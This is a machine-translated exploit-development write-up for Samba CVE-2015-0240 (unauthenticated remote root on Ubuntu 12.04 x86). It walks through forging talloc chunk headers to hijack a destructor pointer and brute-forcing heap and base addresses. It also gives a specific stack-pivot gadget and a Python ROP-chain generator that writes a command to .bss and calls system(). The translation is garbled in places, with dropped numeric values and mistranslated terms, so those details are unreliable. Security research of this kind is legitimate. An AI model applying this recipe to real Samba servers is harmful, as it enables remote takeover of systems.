Samba CVE-2015-0240 Remote Code Execution Vulnerability exploitation practices
1 demo
2 Background
On February 23, 2015, Red Hat product security team released a Samba server smbd vulnerability announcement [1], the vulnerability number is CVE-2015-0240, affects almost all versions. The trigger of this vulnerability does not need to pass the account authentication of the Samba server, while the smbd server usually runs with the root permission. If the vulnerability can be used to execute arbitrary code, attackers can remotely obtain the root permission of the system, which is extremely harmful. Therefore, the CVSS score for this vulnerability also reaches 10.
The basic principle of this vulnerability is that Uninitialized pointers on the stack are passed into the TALLOC_FREE () function. To exploit this vulnerability, you must first control uninitialized data on the stack, which is related to the STACK layout in the compiled binary file. Therefore, a few foreign security researchers have analyzed the binary files on different Linux distributions. Worawit Wang (@ sleepya _) provides better results, he confirmed that in Ubuntu 12.04x86 (Samba 3.6.3) and Debian 7x86 (Samba 3.6.6), this vulnerability can be used for arbitrary remote code execution, for more information, see [2. Later, researchers from NCC Group, a veteran security company in England, gave the idea of exploits [4], but did not give details of exploits and exploit code. This article analyzes and implements exploit for arbitrary remote code execution on the Samba server on the Ubuntu 12.04x86 (similar to Debian 7 x86) platform.
3. Vulnerability Overview
Multiple Articles have provided vulnerability analysis [3]. Here is a brief introduction. The vulnerability occurs in function _ netr_ServerPasswordSet (). The local variable creds was originally expected to be initialized through the netr_creds_server_step_check () function. However, if the construction input causes netr_creds_server_step_check () to fail, as a result, the TALLOC_FREE () function is passed in without the creds initialization:
NTSTATUS _netr_ServerPasswordSet(struct pipes_struct *p, struct netr_ServerPasswordSet *r){ NTSTATUS status = NT_STATUS_OK; int i; struct netlogon_creds_CredentialState *creds; [...] status = netr_creds_server_step_check(p, p->mem_ctx, r->in.computer_name, r->in.credential, r->out.return_authenticator, &creds); unbecome_root(); if (!NT_STATUS_IS_OK(status)) { [...] TALLOC_FREE(creds); return status; }
4. Vulnerability Exploitation
First, let's take a look at the protection mechanisms enabled in smbd binary:
$ checksec.sh --file smbdRELRO STACK CANARY NX PIE RPATH RUNPATH FILEFull RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH smbd
All the protection mechanisms that can be added to the compiler are used. The most important thing to note is that PIE protection is enabled. In this way, if you want to use binary code snippets to perform the drop-down or call the import function, you must first know the address loaded by the program.
4.1 any address Free
To exploit this vulnerability, we first need to find a control flow that can control the uninitialized pointer creds on the stack, so that we can call TALLOC_FREE () for any address (). According to the PoC of @ sleepya _, we already know that in Ubuntu 12.04 and Debian 7 x86 systems, the ReferentID field of PrimaryName in the NetrServerPasswordSet request falls into the position of the uninitialized pointer creds on the stack. In this way, we can create a ReferentID to Free any address. The relevant code in PoC is as follows:
primaryName = nrpc.PLOGONSRV_HANDLE()# ReferentID field of PrimaryName controls the uninitialized value of creds in ubuntu 12.04 32bitprimaryName.fields['ReferentID'] = 0x41414141
4.2 EIP Control
With any address Free, we can find a way to let TALLOC_FREE () release the memory block we control, but we do not know the memory address we can control (the data in the DCERPC request is stored on the stack ). We can raise the heap address, because the smbd process uses the fork method to process each connection, and the memory space layout remains unchanged. In addition, we can allocate a large number of TALLOC memory blocks on the stack to increase the hit rate and minimize the enumeration space. First, let's assume that we already know the heap address. First, let's take a look at how to construct a TALLOC memory block to hijack the EIP. We need to understand the implementation of TALLOC_FREE. First, let's take a look at the structure of the TALLOC memory block:
struct talloc_chunk { struct talloc_chunk *next, *prev; struct talloc_chunk *parent, *child; struct talloc_reference_handle *refs; talloc_destructor_t destructor; const char *name; size_t size; unsigned flags; void *pool; 8 bytes padding;};
To ensure 16-byte alignment, there is an 8-byte padding at the end of the structure, so that the talloc_chunk structure has a total of 48 bytes. In this structure, destructor is a function pointer, which can be constructed at will. Let's take a look at the Code expanded by the macro TALLOC_FREE:
_PUBLIC_ int _talloc_free(void *ptr, const char *location){ struct talloc_chunk *tc; if (unlikely(ptr == NULL)) { return -1; } tc = talloc_chunk_from_ptr(ptr); ...}
_ Talloc_free () calls talloc_chunk_from_ptr () again. This function is used to convert the memory pointer (the pointer ptr returned to the user upon allocation) to the talloc_chunk pointer.
/* panic if we get a bad magic value */static inline struct talloc_chunk *talloc_chunk_from_ptr(const void *ptr){ const char *pp = (const char *)ptr; struct talloc_chunk *tc = discard_const_p(struct talloc_chunk, pp - TC_HDR_SIZE); if (unlikely((tc->flags & (TALLOC_FLAG_FREE | ~0xF)) != TALLOC_MAGIC)) { if ((tc->flags & (~0xFFF)) == TALLOC_MAGIC_BASE) { talloc_abort_magic(tc->flags & (~0xF)); return NULL; } if (tc->flags & TALLOC_FLAG_FREE) { talloc_log("talloc: access after free error - first free may be at %s\n", tc->name); talloc_abort_access_after_free(); return NULL; } else { talloc_abort_unknown_value(); return NULL; } } return tc;}
This function only removes the user memory pointer TC_HDR_SIZE and returns the result. TC_HDR_SIZE is the size of talloc_chunk 48, but we need to meet the tc-> flags check and set it to the correct Magic Number, otherwise, the function cannot return the correct pointer. Next we will continue to look at the _ talloc_free () function:
_PUBLIC_ int _talloc_free(void *ptr, const char *location){ ... tc = talloc_chunk_from_ptr(ptr); if (unlikely(tc->refs != NULL)) { struct talloc_reference_handle *h; if (talloc_parent(ptr) == null_context && tc->refs->next == NULL) { return talloc_unlink(null_context, ptr); } talloc_log("ERROR: talloc_free with references at %s\n", location); for (h=tc->refs; h; h=h->next) { talloc_log("\treference at %s\n", h->location); } return -1; } return _talloc_free_internal(ptr, location);}
If tc-> refs is not equal to NULL, go to the if branch. To keep the first if branch in it from hanging, we need to set tc-> parent pointer to NULL; the next for loop requires us to point tc-> refs to a legal linked list, which is somewhat complicated. Let's take a look at the case where tc-> refs is NULL, that is, the program enters the _ talloc_free_internal () function:
static inline int _talloc_free_internal(void *ptr, const char *location){ ... if (unlikely(tc->flags & TALLOC_FLAG_LOOP)) { /* we have a free loop - stop looping */ return 0; } if (unlikely(tc->destructor)) { talloc_destructor_t d = tc->destructor; if (d == (talloc_destructor_t)-1) { return -1; } tc->destructor = (talloc_destructor_t)-1; if (d(ptr) == -1) { // call destructor tc->destructor = d; return -1; } tc->destructor = NULL; } ...}
We skipped the unnecessary part of the function. In the above function, we have seen that the destructor of talloc_chunk is called, but there are some checks before this: in the first if, we cannot set TALLOC_FLAG_LOOP in flags; in the second if, if destructor is set to-1, the function returns-1, and the program does not crash, if destructor is set to another illegal address, the program crashes and exits. We can use this feature to verify whether the address of the poor heap is accurate: We can set destructor to-1 during the poor lifting. When we find one for TALLOC_FREE () the address does not cause the program to crash (the request has returned), then set destructor as an invalid address. If the program crashes at this time, it indicates that the address we found is correct. Now let's summarize the conditions that should be met by the chunk we need to construct:
Struct talloc_chunk {struct talloc_chunk * next, * prev; // No required struct talloc_chunk * parent, * child; // No required struct limit * refs; // refs = 0 Required destructor; // destructor =-1: (No Crash), others: controled EIP const char * name; size_t size; unsigned flags; // condition 1: flags & (TALLOC_FLAG_FREE | ~ 0xF) = TALLOC_MAGIC // condition 2: tc-> flags & TALLOC_FLAG_LOOP = False void * pool; // 8 bytes padding not required; // No requirement };
So far, we have known how to control the EIP by constructing a chunk and passing it to TALLOC_FREE.
4.3 poor heap address
After the PoC is modified and combined with gdb debugging, we can use the new password to construct a large number of chunks (corresponding to the uasNewPass ['data'] In the PoC). Although many of the requests sent to Samba are stored in the heap (for example, username and password, refer to [2]), many data requirements comply with WSTR encoding and cannot contain arbitrary characters. To improve the efficiency of the heap address, we use the idea [4] to compress chunk in five fields including refs, destructor, name, size, and flags, reduce the size from 48 bytes to 20 bytes. In this way, we only need to raise 5 offsets for each address, instead of the original 12 offsets. Shows the ing between the compressed chunk injection and the actual talloc_chunk structure.
The quantity of chunk injection will also affect the efficiency of the effort. If many chunks are sprayed in the memory, the enumerated space will be reduced, however, the time overhead caused by factors such as network transmission and program input processing increases during each enumeration. Therefore, you need to select a discounted value based on the actual situation. In addition, we use the process pool in the exploit implementation to implement parallel enumeration, which improves the efficiency of exhaustion.
4.4 ROP
To implement the ROP, we also need to enumerate the base addresses loaded by the Samba program. Because the minimum granularity of the address randomization protection mechanism is the memory page, we can enumerate by PAGE (0 x bytes ). We have tested a large number of possible ranges of address spaces on the platform. There are roughly 0 x possible ranges, which are acceptable. Now we can only control an EIP by constructing a destructor. To achieve the ROP, we first need to perform stack migration. We found the following gadget In the binary file of samba:
0x000a6d7c: lea esp, dword [ecx-0x04] ; ret ;
Since the ecx-0x4 points to the name field of the chunk in the field that controls the EIP, we can start with the name field to perform the drop-down. By setting a pop4ret (pop eax; pop esi; pop edi; pop ebp; ret;) gadget, you can point esp to the name field of the next compressed chunk, in sequence, until ESP reaches the end of our injected memory, we can write the ROP Payload without limit.
[4] The specific stack migration gadget is not provided, but according to the illustration given in this article, it can be inferred that NCC Group researchers use the same gadget.
4.5 Arbitrary Code Execution
Note that the system function is imported into the smbd program, so we can directly call the system PLT address to execute any command. But how to write commands? If you use commands in the heap, we only know the chunk compression address, but only four bytes are available. Therefore, we should call snprintf, write commands to the bss section byte. This method can execute commands of any length. Note that when calling snprintf and system, because binary uses address-independent code (PIC), you need to restore the GOT table address to the ebx register. The Python code for generating the ROP Payload is as follows:
# ebx => gotrop = l32(popebx) + l32(got)# write cmd to bss, fmt == "%c"for i in xrange(len(cmd)): c = cmd[i] rop += l32(snprintf) + l32(pop4ret) rop += l32(bss + i) + l32(2) + l32(fmt) + l32(ord(c))# system(cmd)rop += l32(system) + 'leet' + l32(bss)
[4] The method used in is the traditional mmap () + memcpy () method and then execute shellcode to achieve the same effect.